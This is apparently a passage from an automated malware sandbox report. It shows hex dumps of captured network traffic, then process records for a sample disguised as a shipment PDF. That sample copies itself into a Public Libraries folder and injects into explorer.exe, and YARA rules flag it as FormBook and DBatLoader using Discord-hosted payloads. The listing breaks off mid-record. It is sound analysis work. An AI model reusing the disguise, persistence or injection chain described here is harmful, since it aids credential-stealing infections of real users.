fa 1f f3 e1 0f 05 10 80 98 46 1a 76 88 5b 20 12 f1 89 f7 dd 3a 3e 36 2b ec 91 c3 6f 24 6e a7 81 7c f0 07 33 a5 a0 00 a9 bd 79 1c 7b 04 99 b5 f9 9c 3d ac 00 a0 32
                                                Data Ascii: AH{mL|\QDYm/L.PAlLOp)y7&gYzIk*ONJ,N=-|2_Oq=s7bKCeLnxPingI.d-A@0zAH'.g=3go6(CTKFv[ :>6+o$n|3y{=2
                                                2021-10-13 18:36:11 UTC867INData Raw: 4a 77 78 e6 f3 8e 07 56 88 0d 79 68 dc d7 57 17 61 2f aa 5e bb 07 54 62 b3 91 5d da 2d 4d 00 3a ae 97 4e 7e 0b 9f c4 9d bf fc 24 f1 89 62 b5 51 0c 4a 73 f2 08 34 42 89 8f f8 1a e9 76 0c e2 08 d9 a2 4b 17 7d 9f c4 70 d3 ac 63 de db b9 02 27 a3 20 12 1c 09 b6 7b 52 8b ab e1 5c a3 f2 0c dd 59 24 1c 36 47 cf 37 f5 93 98 33 ff ab de db 6b 47 cf 37 f5 d1 1b a6 b1 cf d3 61 cb 0e 03 6c 2d 92 c1 36 a3 ed 64 96 ca 8b 70 f3 6a e4 0e c7 c0 b3 10 cc 54 af 0e 18 00 3a ae 97 4e 7e 0b 9f 3b 2c d0 45 14 0a 22 e8 0b 9f 3b d3 41 e2 e5 ec fd 26 21 15 78 e6 ef 84 3c 56 ab e1 5e a7 ea fa 20 12 de d9 70 d3 7e 0b 9f 3b 2c d0 45 14 0a df 7d 70 f0 47 d3 01 6b b8 7f 88 f2 f3 71 aa a1 36 b8 7f 88 f2 f3 8f 8d 9b 85 85 ba 85 ba 85 ba 87 b5 f9 a3 cf 08 d9 70 d6 e5 6c c9 28 36 b8 7f 88
                                                Data Ascii: JwxVyhWa/^Tb]-M:N~$bQJs4BvK}pc' {R\Y$6G73kG7al-6dpjT:N~;,E";A&!x<V^ p~;,E}pGkq6pl(6
                                                2021-10-13 18:36:11 UTC870INData Raw: 99 b5 b8 0a 71 40 d4 3c a8 85 e7 99 b5 f9 9c c7 9d bf 50 0c 5a 26 21 d4 ba 4d 45 14 0a 28 f4 f8 1a 45 61 97 10 ec bc 00 9d aa d5 b9 fc fb 27 4b fa 1f 90 bb be 8e 5a 14 4d 47 f0 46 17 51 b2 8d 67 dd fb 49 f5 d2 d6 2c 95 ac 22 9d e3 df a1 37 2a 9b 52 8b d5 2f 7a 51 08 98 b9 ae d0 45 15 98 f3 66 bb 46 07 e6 55 12 b0 e7 29 10 ec fd a4 36 c2 97 71 d1 c3 e5 74 c3 f2 f3 71 aa 12 74 57 e8 0a 3d 3a b9 02 8b fd 3e e0 1f 6f af a6 d0 37 ca ab e3 ee 87 85 7a 15 9b b6 93 a7 96 47 fc 9e 41 a3 47 84 a2 b4 89 e0 e3 8f 62 4f e7 5d cd 33 81 f6 6d f4 1f e4 15 86 eb 57 ff ab a0 2f ba 3f dd 18 75 d7 ea d8 b9 fd 58 7a d6 20 12 b0 04 c3 a0 46 2f 3c 36 e6 de ae 97 4f e0 ae 80 f9 dd 30 35 7f 77 25 14 79 c9 d6 37 a2 1a ec a5 02 41 1d 75 bb 76 09 5b 61 a5 aa e6 bf ee fd 59 4b 7f fc
                                                Data Ascii: q@<PZ&!ME(Ea'KZMGFQgI,"7*R/zQEfFU)6qtqtW=:>o7zGAGbO]3mW/?uXz F/<6O05w%y7Auv[aYK
                                                2021-10-13 18:36:11 UTC874INData Raw: f4 4f 03 13 73 73 5a b6 7b 47 f0 21 95 f2 0c c7 24 38 4c 5f 2a 6a c4 c9 29 f7 98 6c c9 6e ce 96 2e 74 dc f6 15 2c 2f ef 84 36 47 b0 6d 69 42 4d ff 83 80 d3 41 e2 e5 24 1c 09 5b 45 93 c2 b6 18 97 c5 7a 98 6f 62 82 93 c2 ec 8e 62 e2 b9 71 22 78 82 90 49 a2 17 47 b3 f4 10 ec e0 1f 6f af 15 78 83 f8 7f 59 6f 39 a0 2f d5 23 ea a4 62 82 93 c2 ec 8e 62 e2 b9 71 22 78 82 90 49 a2 17 47 b3 f4 10 ec e2 1a fb 5e 58 99 d0 c2 fd 88 6e a0 3f ae 0a b2 1f cc 82 cd 5e c2 ec 8e 62 e2 b9 71 22 78 82 90 49 a2 17 47 b3 f4 10 ec e2 1a fb 5e 58 99 b5 f9 9c 58 e1 06 fa 6b 29 cd 54 ee 65 57 7b 31 89 bc e7 14 81 0f 10 bf 4d 8c 61 40 3b bd 65 6f 0c d8 8e 1b 86 08 f9 63 cc 4f fc 24 1c 6c b1 8a 3f ba eb 12 9d de b8 d3 28 56 d0 e6 dd 6a a9 b9 76 92 5c f0 5b 53 7a 84 67 53 64 e1 3f e7
                                                Data Ascii: OssZ{G!$8L_*j)ln.t,/6GmiBMA$[Ezobbq"xIGoxYo9/#bbq"xIG^Xn?^bq"xIG^XXk)TeW{1Ma@;eocO$l?(Vjv\[SzgSd?
                                                2021-10-13 18:36:11 UTC878INData Raw: f4 57 77 09 38 27 c7 24 1c 09 50 79 97 4e 7e f4 10 ec ab 90 48 00 a1 8c 7e 9f a0 46 6e ce bc 75 a0 b9 fd a6 55 12 f1 d8 a9 bc e9 33 a8 31 df 5e a7 d7 43 19 7e 0b 9f c4 df 2f d2 df 2d d6 8d f1 e2 81 3c 56 94 29 a3 32 c1 e9 89 8f de bf 7a 8f ee 66 fe 40 34 26 61 2f b6 7b 66 44 96 d1 c3 1a 42 00 b6 39 a0 2a 46 0e 8a 72 93 cf 5a fa 5f 2a 2a 2a 25 61 d0 45 14 f5 93 a7 d7 19 e5 1f d4 b2 03 22 66 f7 f6 76 85 85 85 85 89 70 2c d0 45 eb 7b 6d 4c 3a 35 b6 2d da bf 72 b6 0d 17 3e 32 4f 67 5f 59 75 2e 4c 3c 56 94 29 bc 75 a0 b9 fd a6 55 12 f1 cf 53 7e a7 b3 98 5c ec 9d cc d7 0b 60 ac 63 3f 22 e8 0b 9f c4 db 30 4a 25 e6 9d cc d4 af a9 b4 07 32 5c d0 d4 b2 0a 9d bf 11 6e dd a6 aa a1 36 47 f0 43 8b e0 8c 47 94 5b 4e f5 e2 87 ee 4f 63 5f 4e f3 ce b5 f9 9c 2f 49 0a 22 e8
                                                Data Ascii: Ww8'$PyN~H~FnuU31^C~/-<V)2zf@4&a/{fDB9*FrZ_***%aE"fvp,E{mL:5-r>2Og_Yu.L<V)uUS~\`c?"0J%2\n6GCG[NOc_N/I"
                                                2021-10-13 18:36:11 UTC882INData Raw: a7 81 83 b0 e6 eb 38 c7 28 6d c7 2c 7c 7b b5 72 8e 48 73 1a 89 4c 22 48 28 e0 95 77 6d 12 55 e1 60 4d 7c 21 1c ac 90 dc d5 af 2b 67 b4 b0 e4 fa 51 09 4b bc 89 87 cc 3b 18 d6 9e 98 ba 87 f8 c3 23 8d d7 c0 93 a7 d7 79 80 09 d2 b5 8e 0b 2e 1f 84 4d 74 ea 13 b5 70 18 76 36 ce e6 b8 d6 58 5a c5 0f 22 e8 f4 10 ee 78 0e 24 97 69 c9 7a 28 7d 62 fa e0 20 86 07 96 aa 5e a7 d5 c8 4f c0 18 27 28 75 cf f4 4b a4 af 15 87 5e 4f 03 4c 7f c6 4a b1 64 a6 1b 79 67 49 2d 88 0d 65 3a fe c0 55 99 45 60 76 6a 92 76 71 96 d1 c3 e5 b2 9a 38 0d 1e fd 07 95 f7 67 c2 92 67 d5 b9 fd dd 5e 4f 03 0d 6f e4 4b fb 13 b8 0b b8 0b 33 03 11 37 91 fc 7b 83 6b b8 7f 7d 5a 77 a7 28 d9 ab df b6 7b 2c a7 bb a6 55 53 39 e8 9c 2d 3b b7 a7 8e 41 22 24 cb 5b df a5 51 43 19 7e f1 ea 10 2a a1 36 b8 61
                                                Data Ascii: 8(m,|{rHsL"H(wmU`M|!+gQK;#y.Mtpv6XZ"x$iz(}b ^O'(uK^OLJdygI-e:UE`vjvq8gg^OoK37{k}Zw({,US9-;A"$[QC~*6a
                                                2021-10-13 18:36:11 UTC886INData Raw: 16 06 91 29 88 84 67 0d 9a 5c a3 8c 32 91 ca fe e8 c7 db ab 16 5b c8 5b 65 b3 f4 10 fc ed 68 38 09 d0 9a b1 8b a4 af 8e 1b c7 00 11 06 81 bc b9 fe 6d c5 e7 24 95 58 d4 4a be bd f8 de 58 75 d4 96 2e 74 51 cb ed db 0a 82 a3 97 d5 15 87 92 ae ae e3 b0 e6 eb 5f 66 30 6c 81 2d 4d f7 13 b5 72 0f e2 0d ee 1a 55 ed 88 86 ce 3e 8d 12 01 c3 e0 6b 63 3f 54 de 8e 4c 2a 79 f8 d9 12 a8 03 17 23 c6 52 60 53 f2 16 a4 b9 c1 e9 89 ae 60 44 91 e7 fc 24 5d 06 24 74 cc 39 aa 07 0f 33 00 f6 e5 87 75 a0 5c d8 24 df a1 36 bf e0 08 25 db df 5e e6 cc 63 5b 30 b0 09 02 93 fd 66 88 69 11 91 ba 0e 1b c3 91 74 57 ef c9 a2 1c 41 b3 0b 68 4b 06 91 29 7b e6 17 f6 0d 34 bd 04 44 95 e9 fd 75 d4 cf 60 53 35 4e 7d 37 41 31 30 c1 5b ad c6 2b c9 19 7e 90 20 53 2e f8 72 8d 59 28 d9 b0 95 25 76
                                                Data Ascii: )g\2[[eh8m$XJXu.tQ_f0l-MrU>kc?TL*y#R`S`D$]$t93u\$6%^c[0fitWAhK){4Du`S5N}7A10[+~ S.rY(%v
                                                2021-10-13 18:36:11 UTC890INData Raw: a4 5c 67 be 8e 1b 86 08 dc 58 fd 59 e4 c2 b7 16 f5 e7 aa da 15 f3 8f 8d df 98 33 c0 92 77 8c c0 18 fb e6 64 46 e5 93 58 67 07 be 8e 5a 8f cd 92 24 ae 68 81 70 0b 6d c7 db ab b2 76 09 0b 68 87 07 52 cc 39 31 44 4c f0 ef 84 42 68 dc 76 e0 52 74 23 bc 12 19 46 e5 be bd f4 9b 60 27 5c 5c 8b bd e4 1a c0 10 e4 9e 93 23 ce e3 34 82 75 9c 66 e5 33 1b f3 71 ae eb 30 71 04 30 31 30 31 fd 2d 61 a4 5a ea 38 c8 58 66 44 3f 35 12 7a f3 df a1 c1 9d b7 b8 0b b3 7f 52 f7 98 c8 24 57 cf bc 9e 13 8c 06 5f 22 51 83 5b 55 ed 7b ee 49 f5 93 a5 e3 8f 99 f3 05 82 75 55 66 7b e9 89 70 2c a4 b8 57 9c 3d d8 ce 8f 75 5b 66 30 ea 73 7f 0b 60 57 94 62 b9 5a 15 7c b6 f0 dc a2 b4 8d 1a 4f 03 4c 7e 96 c6 ae 2e bf c2 13 79 1c c9 ad 19 7e 0b dc 3f 0a 56 94 29 ab 8a f9 90 66 30 ea 73 7f 0b
                                                Data Ascii: \gXY3wdFXgZ$hpmvhR91DLBhvRt#F`'\\#4uf3q0q0101-aZ8XfD?5zR$W_"Q[U{IuUf{p,W=u[f0s`WbZ|OL~.y~?V)f0s
                                                2021-10-13 18:36:11 UTC898INData Raw: a4 05 dc d7 4b f9 b7 17 82 01 1a 66 53 cb a5 32 6b cc 4f fc df ba 6d 44 2a a1 af 0a 88 80 f9 9c 3e 1c e0 1f 6f 02 b7 16 3c dd bd 59 90 df a1 91 dd b1 ef 84 03 4d 45 94 d6 37 35 7c f8 59 90 70 37 8f 10 ec fd a5 b9 eb 84 fc 76 43 0e 21 1e e5 39 45 14 0a 26 cd db bc cf ba 8d ea 07 5a ed 7f 77 64 b5 71 bc 75 a0 14 4a 9f 02 41 0e b2 f9 63 cc 4b 2b 45 07 13 fe 20 61 d0 b6 08 26 21 95 af 4f ea 07 a9 8c be 66 7d f9 6c 9c b6 84 fc bc d0 52 7b 28 ab 7a cf 0b bb f3 4a f4 18 bc 57 17 7d 71 93 4e 7e 0b 30 f0 ef 42 ef 70 86 83 7f 88 95 d7 a3 39 8b 19 1a 20 2e ef 70 17 fe 20 51 d1 3c 56 97 56 7d 8d 66 eb 91 4a b1 64 4e d4 48 8c e9 f2 f4 f8 12 b2 f9 64 e3 ea f8 1a 00 c4 74 23 66 ea fc cc 76 6a 38 19 0a 22 e8 71 47 18 f7 db eb 74 20 47 7d 72 d8 c9 35 2c d0 45 ba 9a d0 ba
                                                Data Ascii: KfS2kOmD*>o<YME75|Yp7vC!9E&ZwdquJAcK+E a&!Of}lR{(zJW}qN~0Bp9 .p Q<VV}fJdNHdt#fvj8"qGt G}r5,E
                                                2021-10-13 18:36:11 UTC914INData Raw: e9 66 32 5a c7 7d 28 e6 dc db 17 f4 ec b8 0b 66 cf f7 1c f6 ea 7d 83 68 c0 d3 2d 3a 44 e2 26 aa 86 83 7f 88 f4 d8 25 9e 01 24 fc 85 84 b1 1f dd d2 40 a0 ea 97 59 1b c7 5e 4b 5b d0 ef 09 5b 4a 27 57 52 06 d4 3b 96 e8 00 80 70 d3 ca 57 52 00 f5 78 3e d1 65 c7 db a9 0f 81 29 93 4c a4 db ab 1e f4 d9 a7 d6 7a eb f0 03 04 44 69 03 3e 36 82 fa 92 07 25 94 c3 99 ff b6 0f 61 5d 2d 58 1a f9 5e 24 cc 3b d3 41 e2 1a 21 6a 3b 2e 5b c8 5b 65 b3 d4 4a 13 43 19 e5 6c 89 3a 7a 83 d5 86 3b 2f f3 07 a6 00 4c ae 5b 73 aa 9a bb eb f0 52 8b d4 4e 42 39 2b 26 7a 28 ad 33 2b 52 74 55 fa f6 d6 37 35 55 80 11 92 60 21 6a 3b 43 58 71 55 12 f1 8a ab 1e f2 f2 a4 d5 cb d1 c3 8a bb ef 7b 92 db d8 48 fe 28 66 0f 0f 01 58 10 88 54 d6 92 e5 5f f2 87 75 a0 bc 12 19 81 3c 27 d3 e0 e1 d1 c3
                                                Data Ascii: f2Z}(f}h-:D&%$@Y^K[[J'WR;pWRx>e)LzDi>6%a]-X^$;A!j;.[[eJCl:z;/L[sRNB9+&z(3+RtU75U`!j;CXqU{H(fXT_u<'
                                                2021-10-13 18:36:11 UTC930INData Raw: f5 93 a7 d7 03 4c 3c 46 6e ce b5 f9 98 07 61 01 4b eb 7b 2d c7 28 b6 15 17 14 81 0c 87 e9 0e a2 27 cf 56 f7 fd c0 f2 5f 6f 42 64 f6 2c 7b 6d 0c db 4c 7c b0 55 ee 02 8a 2a ae 68 80 c2 08 d9 0f 52 07 56 d4 f8 92 25 de e0 9c 3d 98 58 89 8f 9d bf 1d 8b d4 b7 0a dd 59 1b 86 08 d9 4f 03 4c 7c f0 07 56 94 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 a5 a6 a1 c9 69 cf 45 84 71 27 e6 bc c5 5a 96 2e 74 e5 38 4c 3c 6f 48 73 1a 3c aa 5e e7 4a f3 8e 5b 1b 16 fa 5f 11 e2 e5 2c 14 7d 72 98 08 a5 d2 ff c0 83 80 f9 9c 2d b2 32 4a eb 7b 6d 4c 7c f0 07 56 94 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a de af 76 71 27 cc c2 ea bd 78 95 cd 70 b5 8d f7 d1 79 66 bb 47 c9 7d 72 98 0a c5 1f d0 82 02 ca eb 40 db 54 cf 0c 72 d8 8d a2 c7 24 5c 98 bb 07 16 c1 6a c4
                                                Data Ascii: L<FnaK{-('V_oBd,{mL|U*hRV%=XYOL|V)ZAl)ZAiEq'Z.t8L<oHs<^J[_,}r-2J{mL|V)ZAl)ZAl)Zvq'xpyfG}r@Tr$\j
                                                2021-10-13 18:36:11 UTC946INData Raw: ae b3 66 af 67 31 cf 38 ae eb b9 8b ed f4 15 90 e1 aa 80 f9 dc e2 72 8b 38 97 23 8d 14 ea 1a 87 48 fa 1f 90 20 93 2a 25 9e 41 f6 15 45 eb 7b 6d d6 4c 73 17 01 88 88 d6 f9 cf f7 13 b0 6d 4c 7c f3 67 3d 98 be 4d a1 96 88 fe 28 26 21 6a 25 1f 47 79 ae e1 34 14 65 fb fa 1d 03 9c 14 af 19 f4 59 03 c4 dd 5f 5e 7c 74 9e 5b aa 5e a7 d7 b4 cf 32 48 73 5a 9e be 77 e5 3c 05 c1 d5 46 6e ce b7 16 fa 1f 90 df e7 71 15 f5 50 dd 07 09 69 cb d8 fc 7d aa a9 de ae a5 2c fa 6a 1f 14 b3 ea 72 00 c4 99 55 d3 88 7a 13 4a 7d b1 6f 80 8e 1e f6 95 bd e7 f1 82 88 04 34 c2 a8 b1 6f 70 38 cc b3 86 69 b9 82 21 e1 b8 04 89 91 28 29 57 e8 0b df c2 73 1c 17 f7 5d db 13 98 ed a9 87 c3 62 fa 61 f7 6f 56 7f 31 b2 99 e1 1e cd b6 72 ac ae 96 c8 d2 64 32 78 f8 90 f8 1b 46 6f d0 be 03 6d 3b 2b
                                                Data Ascii: fg18r8#H *%AE{mLsmL|g=M(&!j%Gy4eY_^|t[^2HsZw<FnqPi},jrUzJ}o4op8i!()Ws]baoV1rd2xFom;+


                                                Code Manipulations

                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Start time:20:35:45
                                                Start date:13/10/2021
                                                Path:C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe'
                                                Imagebase:0x400000
                                                File size:796160 bytes
                                                MD5 hash:E954C3D029B943B054FCEB27E5E24D2D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:Borland Delphi
                                                Yara matches:
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000001.00000003.270904610.0000000003C8C000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000001.00000002.298456001.0000000000473000.00000008.00020000.sdmp, Author: Florian Roth
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000001.00000002.301666823.0000000003B9C000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000001.00000000.260851932.0000000000471000.00000008.00020000.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000001.00000002.299850141.00000000028B0000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000001.00000002.299172533.0000000000B1A000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000001.00000003.262859681.0000000002E84000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000001.00000002.300537676.0000000002E38000.00000004.00000001.sdmp, Author: Florian Roth
                                                Reputation:low

                                                General

                                                Start time:20:35:58
                                                Start date:13/10/2021
                                                Path:C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe
                                                Imagebase:0x400000
                                                File size:796160 bytes
                                                MD5 hash:E954C3D029B943B054FCEB27E5E24D2D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000000B.00000000.289777084.0000000000471000.00000008.00020000.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:20:36:00
                                                Start date:13/10/2021
                                                Path:C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe'
                                                Imagebase:0x400000
                                                File size:796160 bytes
                                                MD5 hash:E954C3D029B943B054FCEB27E5E24D2D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:Borland Delphi
                                                Yara matches:
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000000C.00000002.321929561.0000000000473000.00000008.00020000.sdmp, Author: Florian Roth
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000000C.00000000.293835698.0000000000471000.00000008.00020000.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000000C.00000002.323136617.0000000002760000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000C.00000002.322398539.00000000009FA000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000000C.00000003.299620122.0000000002D34000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000000C.00000002.323669387.0000000002CE8000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe, Author: Florian Roth
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                Reputation:low

                                                General

                                                Start time:20:36:03
                                                Start date:13/10/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff693d90000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Start time:20:36:09
                                                Start date:13/10/2021
                                                Path:C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe'
                                                Imagebase:0x400000
                                                File size:796160 bytes
                                                MD5 hash:E954C3D029B943B054FCEB27E5E24D2D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:Borland Delphi
                                                Yara matches:
